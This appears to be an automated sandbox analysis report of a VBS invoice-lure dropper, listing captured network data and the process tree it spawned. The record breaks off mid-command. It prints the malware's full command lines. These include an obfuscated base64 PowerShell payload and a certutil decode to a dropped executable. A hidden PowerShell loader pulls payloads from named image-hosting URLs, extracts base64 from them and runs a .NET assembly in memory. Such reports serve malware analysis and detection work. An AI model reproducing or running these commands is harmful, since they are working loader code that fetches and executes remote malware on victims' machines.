2024-04-17 06:39:30 UTC	16336	IN	Data Raw: 4c 64 4f 62 6d 49 61 55 58 41 52 50 63 34 6a 67 35 64 61 42 4a 51 37 68 6c 46 7a 43 30 70 61 47 47 52 61 6a 72 37 38 4a 78 49 75 4a 56 33 62 53 6a 71 69 37 32 79 4c 36 32 54 72 49 65 31 42 50 31 2f 4f 56 78 2b 49 49 4b 57 39 4f 43 6a 65 79 36 53 73 32 4c 75 50 5a 34 4d 79 32 79 30 79 53 63 46 67 2b 76 73 67 64 6d 78 36 70 72 68 32 6b 50 53 2b 74 78 58 49 32 36 4e 4b 52 35 61 7a 49 73 53 50 48 41 5a 48 2f 54 59 36 72 45 76 45 32 42 4b 38 42 5a 79 59 41 42 53 76 4e 6e 39 2b 48 42 50 42 30 68 36 6b 32 73 74 48 4d 48 50 77 6c 64 65 67 51 50 70 62 34 52 2f 4f 6f 71 74 55 71 63 4d 44 33 56 6a 68 63 4e 51 44 30 48 6e 71 37 37 69 62 59 48 79 76 2b 37 56 36 4b 4e 6c 62 73 61 74 36 2f 6c 79 4c 44 57 4d 70 51 67 72 77 6d 6a 72 46 39 31 59 6e 53 68 73 38 45 34 74 54 Data Ascii: LdObmIaUXARPc4jg5daBJQ7hlFzC0paGGRajr78JxIuJV3bSjqi72yL62TrIe1BP1/OVx+IIKW9OCjey6Ss2LuPZ4My2y0yScFg+vsgdmx6prh2kPS+txXI26NKR5azIsSPHAZH/TY6rEvE2BK8BZyYABSvNn9+HBPB0h6k2stHMHPwldegQPpb4R/OoqtUqcMD3VjhcNQD0Hnq77ibYHyv+7V6KNlbsat6/lyLDWMpQgrwmjrF91YnShs8E4tT
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 6f 74 41 54 77 64 2b 4b 30 62 36 57 59 48 56 36 66 78 58 56 6b 33 37 6a 4b 4b 4e 38 2b 68 2b 56 62 7a 64 57 6b 73 7a 6a 66 55 66 64 76 6d 74 44 5a 72 6c 30 65 7a 4c 6a 39 52 66 7a 58 50 4a 66 70 53 52 70 74 4d 32 76 44 73 4c 37 32 52 64 64 7a 75 7a 51 79 53 49 54 32 41 2b 46 6c 61 52 55 61 79 68 53 61 41 75 51 6a 4c 4a 33 46 78 49 4b 41 62 7a 73 4e 6f 65 6f 54 2b 48 43 61 65 4d 43 34 2f 53 66 65 4e 58 62 45 66 78 43 78 39 45 49 45 59 4e 61 52 33 31 56 59 55 4c 7a 32 2f 41 46 74 55 51 44 77 67 46 6a 42 53 76 50 51 4b 4b 6d 53 67 51 74 38 58 78 4b 37 2f 52 72 70 71 38 4d 70 69 67 34 6c 6e 69 59 38 43 47 64 34 68 66 4a 61 79 68 67 6d 4a 70 4d 34 47 42 75 4b 31 4d 2b 6c 4c 47 69 71 6a 51 7a 4d 75 64 67 53 4e 4c 4e 6a 2f 7a 63 37 6d 32 72 35 33 47 64 31 39 61 Data Ascii: otATwd+K0b6WYHV6fxXVk37jKKN8+h+VbzdWkszjfUfdvmtDZrl0ezLj9RfzXPJfpSRptM2vDsL72RddzuzQySIT2A+FlaRUayhSaAuQjLJ3FxIKAbzsNoeoT+HCaeMC4/SfeNXbEfxCx9EIEYNaR31VYULz2/AFtUQDwgFjBSvPQKKmSgQt8XxK7/Rrpq8Mpig4lniY8CGd4hfJayhgmJpM4GBuK1M+lLGiqjQzMudgSNLNj/zc7m2r53Gd19a
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 4a 2b 73 31 74 70 36 62 6f 6e 44 62 70 43 34 39 63 32 70 32 78 6b 35 6f 30 52 34 70 68 57 76 70 2b 69 53 38 63 79 2f 65 56 41 6f 73 62 59 4e 32 4b 55 4e 6d 72 76 58 55 52 46 76 6a 4c 52 54 59 33 77 63 6c 30 36 42 57 31 76 38 41 75 5a 59 66 6c 65 45 61 56 77 4d 2b 55 7a 35 77 5a 4c 48 44 71 75 4e 72 46 6e 6c 4f 56 62 55 56 57 71 30 37 6d 34 7a 4f 59 58 6e 45 2f 7a 54 53 70 78 37 61 57 68 63 67 4f 42 64 31 67 4c 30 7a 71 6f 69 49 4a 51 75 57 2f 66 65 43 33 58 6b 2b 4a 4a 52 53 78 65 30 4c 43 66 56 57 75 36 32 39 4c 30 69 35 64 4e 66 6d 6d 76 32 63 4a 6b 52 55 6f 59 4c 59 62 63 73 43 75 70 45 54 34 78 74 46 33 68 4e 74 34 44 72 58 51 51 77 7a 4a 32 53 46 45 63 77 4b 4e 6d 53 2b 4c 36 72 77 51 47 42 61 4a 42 72 68 78 65 41 72 39 35 4a 75 65 4f 74 77 38 52 33 Data Ascii: J+s1tp6bonDbpC49c2p2xk5o0R4phWvp+iS8cy/eVAosbYN2KUNmrvXURFvjLRTY3wcl06BW1v8AuZYfleEaVwM+Uz5wZLHDquNrFnlOVbUVWq07m4zOYXnE/zTSpx7aWhcgOBd1gL0zqoiIJQuW/feC3Xk+JJRSxe0LCfVWu629L0i5dNfmmv2cJkRUoYLYbcsCupET4xtF3hNt4DrXQQwzJ2SFEcwKNmS+L6rwQGBaJBrhxeAr95JueOtw8R3
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 31 74 62 6c 53 48 38 55 36 74 53 64 72 36 53 34 33 6b 48 65 35 43 78 54 33 54 4b 51 4e 6b 44 44 72 67 67 4b 55 52 49 57 6b 4d 46 39 49 6a 6a 62 73 64 30 6e 6a 77 49 57 63 6e 47 58 4b 42 62 43 66 31 4a 66 74 67 4a 35 6b 34 51 77 7a 78 51 79 31 4e 58 6c 45 4f 6a 36 39 47 65 57 4c 37 63 2f 2b 6d 46 67 78 70 43 33 35 7a 4d 47 39 6a 43 70 65 36 6e 6c 63 63 62 59 34 33 54 67 6d 64 75 66 68 79 64 4f 50 45 79 54 52 5a 43 37 7a 57 4a 54 70 73 77 64 38 51 38 47 7a 47 47 36 43 49 4a 34 30 79 77 78 37 77 64 32 66 6e 4e 6a 51 31 30 2b 6c 4a 2b 74 36 45 68 6c 78 71 33 66 78 30 55 6f 6b 45 41 6a 77 50 54 34 33 57 67 5a 44 76 51 62 2b 34 41 33 4c 6f 41 67 62 77 6c 44 2b 45 46 74 49 59 38 70 4a 35 36 7a 36 45 57 42 35 41 42 6a 6f 61 44 54 55 30 69 2f 6c 61 57 2b 79 44 6a Data Ascii: 1tblSH8U6tSdr6S43kHe5CxT3TKQNkDDrggKURIWkMF9Ijjbsd0njwIWcnGXKBbCf1JftgJ5k4QwzxQy1NXlEOj69GeWL7c/+mFgxpC35zMG9jCpe6nlccbY43TgmdufhydOPEyTRZC7zWJTpswd8Q8GzGG6CIJ40ywx7wd2fnNjQ10+lJ+t6Ehlxq3fx0UokEAjwPT43WgZDvQb+4A3LoAgbwlD+EFtIY8pJ56z6EWB5ABjoaDTU0i/laW+yDj
2024-04-17 06:39:30 UTC	16376	IN	Data Raw: 76 6e 2b 44 31 4e 73 59 52 4a 4a 63 4e 4c 64 72 41 63 39 59 4f 5a 59 47 73 4c 48 74 70 46 38 4c 4e 5a 68 2f 37 47 39 45 39 77 52 2b 78 51 50 4b 6d 61 38 79 6e 50 43 72 38 77 6a 50 4b 45 4f 34 38 37 43 45 58 73 6a 58 55 71 30 2b 55 5a 67 51 74 2b 37 31 6c 78 6e 78 47 43 48 72 2f 6a 36 4d 38 31 32 69 44 30 73 52 73 63 38 4f 39 6c 50 66 75 71 4b 6c 61 74 6b 2f 48 63 37 75 42 42 44 4f 45 61 72 70 4d 30 6f 47 44 42 31 6f 64 4b 56 30 36 32 6d 51 6f 72 52 72 46 34 75 72 50 62 63 6d 68 4d 50 4a 6b 47 6c 50 4e 53 68 33 2f 46 55 73 48 56 46 51 67 63 47 72 37 4b 58 79 52 2b 6d 6b 70 46 68 62 6f 72 34 4f 43 74 65 49 4e 54 77 70 56 68 30 59 71 33 2f 55 32 34 57 39 30 5a 52 6b 51 49 6e 65 78 54 55 63 32 4b 73 63 73 2f 37 67 63 66 35 46 6f 2f 54 33 33 4d 64 55 49 76 76 Data Ascii: vn+D1NsYRJJcNLdrAc9YOZYGsLHtpF8LNZh/7G9E9wR+xQPKma8ynPCr8wjPKEO487CEXsjXUq0+UZgQt+71lxnxGCHr/j6M812iD0sRsc8O9lPfuqKlatk/Hc7uBBDOEarpM0oGDB1odKV062mQorRrF4urPbcmhMPJkGlPNSh3/FUsHVFQgcGr7KXyR+mkpFhbor4OCteINTwpVh0Yq3/U24W90ZRkQInexTUc2Kscs/7gcf5Fo/T33MdUIvv
2024-04-17 06:39:30 UTC	8	IN	Data Raw: 42 78 38 4b 58 37 6a 39 Data Ascii: Bx8KX7j9
2024-04-17 06:39:30 UTC	16384	IN	Data Raw: 55 72 4e 65 47 62 34 63 6b 42 74 51 63 38 53 51 4e 4f 4a 4e 6a 69 2f 72 55 43 70 71 53 74 50 46 38 41 69 39 64 6c 4b 52 72 66 70 66 6f 69 2f 69 78 73 42 72 6f 48 51 74 59 6c 71 57 6c 34 7a 41 6b 61 69 74 6f 76 50 65 72 58 6c 55 4f 54 76 4c 6a 31 55 63 36 65 63 63 37 30 64 6a 55 79 57 77 54 31 34 6c 52 43 53 65 67 6b 33 2f 55 30 6f 47 52 6d 64 66 34 51 63 59 74 7a 53 50 61 6e 51 71 6b 61 4e 30 61 44 43 72 41 46 33 44 78 6a 78 41 6a 73 63 4e 33 38 64 61 71 64 72 52 77 58 49 50 69 46 52 59 51 70 47 67 47 46 45 31 41 55 50 65 70 76 6f 48 4b 57 73 59 52 7a 66 67 77 45 30 46 71 63 6a 37 2f 64 52 51 33 5a 78 68 4e 68 38 54 2b 59 61 4d 72 4b 49 62 4c 6c 2f 5a 79 41 62 41 33 36 6d 7a 58 65 70 71 6e 4c 4b 67 55 4f 31 49 56 4a 6f 61 61 72 58 34 6b 44 35 61 78 6d 6c Data Ascii: UrNeGb4ckBtQc8SQNOJNji/rUCpqStPF8Ai9dlKRrfpfoi/ixsBroHQtYlqWl4zAkaitovPerXlUOTvLj1Uc6ecc70djUyWwT14lRCSegk3/U0oGRmdf4QcYtzSPanQqkaN0aDCrAF3DxjxAjscN38daqdrRwXIPiFRYQpGgGFE1AUPepvoHKWsYRzfgwE0Fqcj7/dRQ3ZxhNh8T+YaMrKIbLl/ZyAbA36mzXepqnLKgUO1IVJoaarX4kD5axml

Target ID:	0
Start time:	08:39:19
Start date:	17/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
Imagebase:	0x7ff6938b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBmDgTreGcDgTreLwBlDgTreGMDgTreYQByDgTreGcDgTreLwBwDgTreG8DgTreaDgTreBzDgTreC4DgTrebQBvDgTreG4DgTrebwBjDgTreG4DgTreYQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBNDgTreFMDgTreQgB1DgTreGkDgTrebDgTreBkDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
Imagebase:	0x7ff7546e0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
Imagebase:	0x7ff765930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:39:21
Start date:	17/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:39:23
Start date:	17/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 